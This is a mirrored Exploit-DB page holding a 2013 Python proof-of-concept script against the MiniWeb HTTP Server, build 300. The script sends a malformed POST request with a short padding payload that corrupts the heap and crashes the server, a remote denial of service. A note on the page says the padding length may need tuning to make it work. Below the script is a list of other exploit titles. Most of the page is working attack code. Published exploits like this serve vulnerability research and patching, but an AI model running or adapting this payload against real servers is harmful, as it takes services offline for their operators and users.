MiniWeb HTTP Server 300 – Crash (PoC)

Exploit Database
9 阅读

作者： dmnt

日期： 2013-05-13
类别：
- dos
平台：
- windows
来源：https://www.exploit-db.com/exploits/25418/

# MiniWeb HTTP server (build 300, built on Feb 28 2013) by Stanley Huang
# http://sourceforge.net/projects/miniweb/files/miniweb/0.8/miniweb-win32-20130309.zip/download
# Heap corruption PoC - remote DoS
# Tested on Win7 SP1 RUS
# (x) dmnt 2013

import socket

print 'Mini Web HTTP Server remote DoS exploit by dmnt\n'
host = "127.0.0.1"
port = 8000
s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
s.connect((host, port))
print 'Connect to host and send payload\n'
stuff = 'POST /'+'"' +' HTTP/1.\r\n'
stuff+= 'Content-Type: application/x-www-form-urlencoded\r\n'
stuff+= 'Content-Length: 0\r\n\r\n'
stuff+= 'A'*15
s.send(stuff)
print 'Server crashed\n'

# Exploit-DB note:
# Tinker with the amount of As to get this to work

last Exploits
MiniWeb HTTP Server 300 – Crash (PoC)的更多信息

no$gba 2.5c – ‘.nds’ Local crash：
IBM DB2 – ‘kuddb2’ Remote Denial of Service：
Adobe Flash AS2 – MovieClip.scrollRect Use-After-Free：
SuperScan 4.1 – Scan Hostname/IP Field Buffer Overflow：
MP4 Player 4.0 – Local Crash (PoC)：
Adobe Flash – ATF Planar Decompression Heap Overflow：
Microsoft Windows SMB Server (v1/v2) – Mount Point Arbitrary Device Open Privilege Escalation：
Lyric Video Creator 2.1 – ‘.mp3’ Denial of Service (PoC)：